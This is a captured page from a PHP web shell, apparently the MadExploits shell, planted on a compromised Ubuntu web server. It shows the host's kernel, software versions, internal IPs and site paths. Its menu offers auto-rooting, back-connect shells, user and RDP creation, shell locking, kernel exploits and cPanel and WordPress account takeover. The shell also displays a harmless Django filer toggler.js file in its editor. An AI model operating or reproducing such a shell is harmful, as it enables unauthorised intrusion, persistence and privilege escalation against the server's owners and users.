Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
static /
filer /
js /
addons /
[ HOME SHELL ]
Name
Size
Permission
Action
copy-move-files.js
748
B
-rw-r--r--
dropdown-menu.js
5.65
KB
-rw-r--r--
dropzone.init.js
6.56
KB
-rw-r--r--
filer_popup_response.js
808
B
-rw-r--r--
focal-point.js
4.49
KB
-rw-r--r--
popup_handling.js
2.59
KB
-rw-r--r--
table-dropzone.js
10.15
KB
-rw-r--r--
toggler.js
2.83
KB
-rw-r--r--
tooltip.js
558
B
-rw-r--r--
upload-button.js
5.29
KB
-rw-r--r--
widget.js
1.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : toggler.js
// #TOGGLER# // This script implements the simple element toggle 'use strict'; var Cl = window.Cl || {}; /* global Class, django */ // as of Django 2.x we need to check where jQuery is var djQuery = window.$; if (django.jQuery) { djQuery = django.jQuery; } (function ($) { Cl.Toggler = new Class({ options: { linksSelector: '.js-toggler-link', dataHeaderSelector: 'toggler-header-selector', dataContentSelector: 'toggler-content-selector', collapsedClass: 'js-collapsed', expandedClass: 'js-expanded', hiddenClass: 'hidden' }, initialize: function (options) { var that = this; this.options = $.extend({}, this.options, options); this.togglerInstances = []; $(this.options.linksSelector).each(function () { var togglerInstance = new Cl.TogglerConstructor(this, that.options); that.togglerInstances.push(togglerInstance); }); }, destroy: function () { this.links = null; this.togglerInstances.forEach(function (togglerInstance) { togglerInstance.destroy(); }); this.togglerInstances = []; } }); Cl.TogglerConstructor = new Class({ _updateClasses: function () { if (this.content.hasClass(this.options.hiddenClass)) { this.header.removeClass(this.options.expandedClass); this.header.addClass(this.options.collapsedClass); } else { this.header.addClass(this.options.expandedClass); this.header.removeClass(this.options.collapsedClass); } }, _onTogglerClick: function (clickEvent) { this.content.toggleClass(this.options.hiddenClass); this._updateClasses(); clickEvent.preventDefault(); }, _initLink: function () { this._updateClasses(); this._onTogglerClick = $.proxy(this._onTogglerClick, this); this.link.on('click', this._onTogglerClick); }, initialize: function (link, options) { this.options = $.extend({}, this.options, options); this.link = $(link); this.headerSelector = this.link.data(this.options.dataHeaderSelector); this.contentSelector = this.link.data(this.options.dataContentSelector); this.header = $(this.headerSelector); this.header = this.header.length ? this.header : this.link; this.content = $(this.contentSelector); if (this.content.length === 0) { return; } this._initLink(); }, destroy: function () { this.options = null; this.link = null; } }); })(djQuery);
Close